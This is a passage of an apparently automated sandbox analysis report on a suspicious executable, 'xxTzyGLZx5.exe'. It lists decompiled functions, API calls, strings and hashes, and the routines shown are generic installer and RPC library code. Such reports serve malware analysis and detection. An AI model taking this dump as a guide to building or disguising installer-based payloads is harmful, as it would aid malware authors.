                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return _t29;
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6B42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: 232b65a044e6c7881550a39647faaff6c3178238ba8464f9fc68479e9b32cde7
                                                                                                • Instruction ID: 54ab135d15a82df9703553afce22e300ec8ffb09c79e6390dacd696f18b05904
                                                                                                • Opcode Fuzzy Hash: 232b65a044e6c7881550a39647faaff6c3178238ba8464f9fc68479e9b32cde7
                                                                                                • Instruction Fuzzy Hash: 33215EB5900109EBCB04CFD8D890DBEB7B9AF89305F148588F9198B341E630DF50DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4AB9
                                                                                                • NDRSContextUnmarshall2.RPCRT4(?,?,?,00000000,00000000), ref: 6EDA4ADB
                                                                                                Strings
                                                                                                • (%p), xrefs: 6EDA4A58
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA4AA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall2
                                                                                                • String ID: (%p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3284517403-2888871361
                                                                                                • Opcode ID: ec37d1fd271bb769bec2de28cbd073d7115d9d84ab5776f6cb6b926dbb90de36
                                                                                                • Instruction ID: 1bb1ac1d5b291f13b22f3844b217dae713bea6c6d9476acf6b5d94248363a93b
                                                                                                • Opcode Fuzzy Hash: ec37d1fd271bb769bec2de28cbd073d7115d9d84ab5776f6cb6b926dbb90de36
                                                                                                • Instruction Fuzzy Hash: D2210BB9600204EFC704CF48D890E59BB66EF89759F14C158FA499F386D632EE91CBE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2420
                                                                                                • NDRSContextMarshall2.RPCRT4(?,?,?,?,00000000,00000000), ref: 6EDA2441
                                                                                                Strings
                                                                                                • (%p, %p, %p), xrefs: 6EDA23BF
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA240E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshall2Raise
                                                                                                • String ID: (%p, %p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3146093750-1272072389
                                                                                                • Opcode ID: a24802865635c5db69758f788b2c23a2c79b80d1c3b5d2b288ea265a93eeaf63
                                                                                                • Instruction ID: 4cfdd041eb7649c41f41c64cbf0efedf5ffc8bf3298785b9ce5697595f6ed8ec
                                                                                                • Opcode Fuzzy Hash: a24802865635c5db69758f788b2c23a2c79b80d1c3b5d2b288ea265a93eeaf63
                                                                                                • Instruction Fuzzy Hash: 6921CC79600204EFD704CF48D891E5A7BA6AF88754F14C148FA494F396D631E951CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAA32D
                                                                                                • RpcRaiseException.RPCRT4(0000000E), ref: 6EDAA34A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: -- %p$overflow of adjusted_len %ld, len %ld
                                                                                                • API String ID: 3997070919-2781439172
                                                                                                • Opcode ID: 89b1826f1f873967acfd4a8ab2ed3ba8f967de14ff901029035e7bad009cb21a
                                                                                                • Instruction ID: 3d61bb75c8c2765538e07b268227b88a81a0e0ae689726e6e674744c32ff31c0
                                                                                                • Opcode Fuzzy Hash: 89b1826f1f873967acfd4a8ab2ed3ba8f967de14ff901029035e7bad009cb21a
                                                                                                • Instruction Fuzzy Hash: C821D5B5A00208EFCB04DF98C884A9EBBB5BF49314F10C298E919AB345D771AA41CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDA7400: _memset.LIBCMT ref: 6EDA7421
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2380
                                                                                                • NDRCContextMarshall.RPCRT4(?,?), ref: 6EDA2391
                                                                                                Strings
                                                                                                • (%p, %p, %d), xrefs: 6EDA231F
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA236E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshallRaise_memset
                                                                                                • String ID: (%p, %p, %d)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 2061417460-413767583
                                                                                                • Opcode ID: 0af70368f66b779723b4a28cb68613657397be3a3db9a085776d2c3c43e9005d
                                                                                                • Instruction ID: a8c6764338723ec73ff8bebce8d72bb44271bccdd093a51fac12427db2f8b640
                                                                                                • Opcode Fuzzy Hash: 0af70368f66b779723b4a28cb68613657397be3a3db9a085776d2c3c43e9005d
                                                                                                • Instruction Fuzzy Hash: 221100B9600104EFCB04CF98D890D597BA6FF49358B14C148FA498F346D731E991CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                • _memmove.LIBCMT ref: 6EDAB016
                                                                                                Strings
                                                                                                • pointer is the same as the buffer, xrefs: 6EDAAFFA
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6EDAAFD7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                                • API String ID: 4056999889-2199830383
                                                                                                • Opcode ID: 4fac68bbc4de2ac7a511ae14de528a6480d2d075628f632a59307707ea60f1e1
                                                                                                • Instruction ID: ed77dc470c1e268d9c6ef7c6ca3c900f8f457b5eabc48486b87cb4be97412cc7
                                                                                                • Opcode Fuzzy Hash: 4fac68bbc4de2ac7a511ae14de528a6480d2d075628f632a59307707ea60f1e1
                                                                                                • Instruction Fuzzy Hash: 1D11CBB5600209EFCB04DF88D890D9ABBA6BF48354B15C648FD494B346D731FA51CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040518B(CHAR* _a4) {
                                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                                				int _t7;
                                                                                                
                                                                                                				0x42bfe0->cb = 0x44;
                                                                                                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
                                                                                                				if(_t7 != 0) {
                                                                                                					CloseHandle(_v20.hThread);
                                                                                                					return _v20.hProcess;
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}






                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                                                                                • CloseHandle.KERNEL32(?), ref: 004051BD
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                                                                                • Error launching installer, xrefs: 0040519E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                • API String ID: 3712363035-1785902839
                                                                                                • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                                • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                                                                                • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                                • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040541E(CHAR* _a4) {
                                                                                                				CHAR* _t7;
                                                                                                
                                                                                                				_t7 = _a4;
                                                                                                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                					lstrcatA(_t7, 0x40900c);
                                                                                                				}
                                                                                                				return _t7;
                                                                                                			}





                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                                                                                • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-3081826266
                                                                                                • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                                • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                                                                                • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                                • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB7376(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				int _v20;
                                                                                                				int _t35;
                                                                                                				int _t38;
                                                                                                				intOrPtr* _t44;
                                                                                                				int _t47;
                                                                                                				short* _t49;
                                                                                                				intOrPtr _t50;
                                                                                                				intOrPtr _t54;
                                                                                                				int _t55;
                                                                                                				int _t59;
                                                                                                				char* _t62;
                                                                                                
                                                                                                				_t62 = _a8;
                                                                                                				if(_t62 == 0) {
                                                                                                					L5:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t50 = _a12;
                                                                                                				if(_t50 == 0) {
                                                                                                					goto L5;
                                                                                                				}
                                                                                                				if( *_t62 != 0) {
                                                                                                					E6EDB1E23( &_v20, _a16);
                                                                                                					_t35 = _v20;
                                                                                                					__eflags =  *(_t35 + 0xa8);
                                                                                                					if( *(_t35 + 0xa8) != 0) {
                                                                                                						_t38 = E6EDB71BC( *_t62 & 0x000000ff,  &_v20);
                                                                                                						__eflags = _t38;
                                                                                                						if(_t38 == 0) {
                                                                                                							__eflags = _a4;
                                                                                                							_t59 = 1;
                                                                                                							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                							if(__eflags != 0) {
                                                                                                								L21:
                                                                                                								__eflags = _v8;
                                                                                                								if(_v8 != 0) {
                                                                                                									_t54 = _v12;
                                                                                                									_t31 = _t54 + 0x70;
                                                                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                									__eflags =  *_t31;
                                                                                                								}
                                                                                                								return _t59;
                                                                                                							}
                                                                                                							L20:
                                                                                                							_t44 = E6EDB2A94(__eflags);
                                                                                                							_t59 = _t59 | 0xffffffff;
                                                                                                							__eflags = _t59;
                                                                                                							 *_t44 = 0x2a;
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t59 = _v20;
                                                                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                                                                						if( *(_t59 + 0x74) <= 1) {
                                                                                                							L15:
                                                                                                							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                							L16:
                                                                                                							if(__eflags < 0) {
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							__eflags = _t62[1];
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							L18:
                                                                                                							_t59 =  *(_t59 + 0x74);
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                						if(__eflags < 0) {
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						__eflags = _a4;
                                                                                                						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                                						_t59 = _v20;
                                                                                                						__eflags = _t47;
                                                                                                						if(_t47 != 0) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					_t55 = _a4;
                                                                                                					__eflags = _t55;
                                                                                                					if(_t55 != 0) {
                                                                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                                                                					}
                                                                                                					_t59 = 1;
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				_t49 = _a4;
                                                                                                				if(_t49 != 0) {
                                                                                                					 *_t49 = 0;
                                                                                                				}
                                                                                                				goto L5;
                                                                                                			}

                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6EDB73AC
                                                                                                • __isleadbyte_l.LIBCMT ref: 6EDB73DA
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6EDB7408
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6EDB743E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 93eb5cba68d9bfdf7b6836fdce471a294143fb223ea5bd87cb81acafed9097c4
                                                                                                • Instruction ID: b5680dc7430a9a6987ea2ca31e7191ae6478d37cc6fec5ed5bdb44931e3f2fb4
                                                                                                • Opcode Fuzzy Hash: 93eb5cba68d9bfdf7b6836fdce471a294143fb223ea5bd87cb81acafed9097c4
                                                                                                • Instruction Fuzzy Hash: 4331BCB0604206FFEB118FB5C844BAE7FB9AF41311F014628E8668B2D0F730D861DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                                				char* _t18;
                                                                                                				int _t19;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				_t18 = E004029E8(0xffffffee);
                                                                                                				 *(_t30 - 0x2c) = _t18;
                                                                                                				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                                                                				 *__esi = __ebx;
                                                                                                				 *(_t30 - 8) = _t19;
                                                                                                				 *__edi = __ebx;
                                                                                                				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                                                                				if(_t19 != __ebx) {
                                                                                                					__eax = GlobalAlloc(0x40, __eax);
                                                                                                					 *(__ebp + 8) = __eax;
                                                                                                					if(__eax != __ebx) {
                                                                                                						if(__eax != 0) {
                                                                                                							__ebp - 0x44 = __ebp - 0x34;
                                                                                                							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                                                                								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                                								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                                								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                                							}
                                                                                                						}
                                                                                                						_push( *(__ebp + 8));
                                                                                                						GlobalFree();
                                                                                                					}
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1404258612-0
                                                                                                • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                                • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                                                                                • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                                • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB1ECC(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                				intOrPtr _t25;
                                                                                                				void* _t26;
                                                                                                
                                                                                                				_t25 = _a16;
                                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                					_t26 = E6EDB241D(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					_t34 = _t25 - 0x66;
                                                                                                					if(_t25 != 0x66) {
                                                                                                						__eflags = _t25 - 0x61;
                                                                                                						if(_t25 == 0x61) {
                                                                                                							L7:
                                                                                                							_t26 = E6EDB1F52(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                						} else {
                                                                                                							__eflags = _t25 - 0x41;
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L7;
                                                                                                							} else {
                                                                                                								_t26 = E6EDB2698(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                							}
                                                                                                						}
                                                                                                						L9:
                                                                                                						return _t26;
                                                                                                					} else {
                                                                                                						return E6EDB25D7(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004054B2(char _a4) {
                                                                                                				CHAR* _t3;
                                                                                                				char* _t5;
                                                                                                				CHAR* _t7;
                                                                                                				CHAR* _t8;
                                                                                                				void* _t10;
                                                                                                
                                                                                                				_t1 =  &_a4; // 0x405264
                                                                                                				_t8 =  *_t1;
                                                                                                				_t7 = CharNextA(_t8);
                                                                                                				_t3 = CharNextA(_t7);
                                                                                                				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                                                					if( *_t8 != 0x5c5c) {
                                                                                                						L8:
                                                                                                						return 0;
                                                                                                					}
                                                                                                					_t10 = 2;
                                                                                                					while(1) {
                                                                                                						_t10 = _t10 - 1;
                                                                                                						_t5 = E00405449(_t3, 0x5c);
                                                                                                						if( *_t5 == 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						_t3 = _t5 + 1;
                                                                                                						if(_t10 != 0) {
                                                                                                							continue;
                                                                                                						}
                                                                                                						return _t3;
                                                                                                					}
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					return CharNextA(_t3);
                                                                                                				}
                                                                                                			}









                                                                                                APIs
                                                                                                • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004054C0
                                                                                                • CharNextA.USER32(00000000), ref: 004054C5
                                                                                                • CharNextA.USER32(00000000), ref: 004054D4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CharNext
                                                                                                • String ID: dR@
                                                                                                • API String ID: 3213498283-1322173608
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E00401D1B() {
                                                                                                				void* __esi;
                                                                                                				int _t6;
                                                                                                				signed char _t11;
                                                                                                				struct HFONT__* _t14;
                                                                                                				void* _t18;
                                                                                                				void* _t24;
                                                                                                				void* _t26;
                                                                                                				void* _t28;
                                                                                                
                                                                                                				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                                                                				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                                                                                				 *0x40af8c = E004029CB(3);
                                                                                                				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                                				 *0x40af93 = 1;
                                                                                                				 *0x40af90 = _t11 & 0x00000001;
                                                                                                				 *0x40af91 = _t11 & 0x00000002;
                                                                                                				 *0x40af92 = _t11 & 0x00000004;
                                                                                                				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
                                                                                                				_t14 = CreateFontIndirectA(0x40af7c);
                                                                                                				_push(_t14);
                                                                                                				_push(_t26);
                                                                                                				E00405889();
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D22
                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                                                                                Memory Dump Source
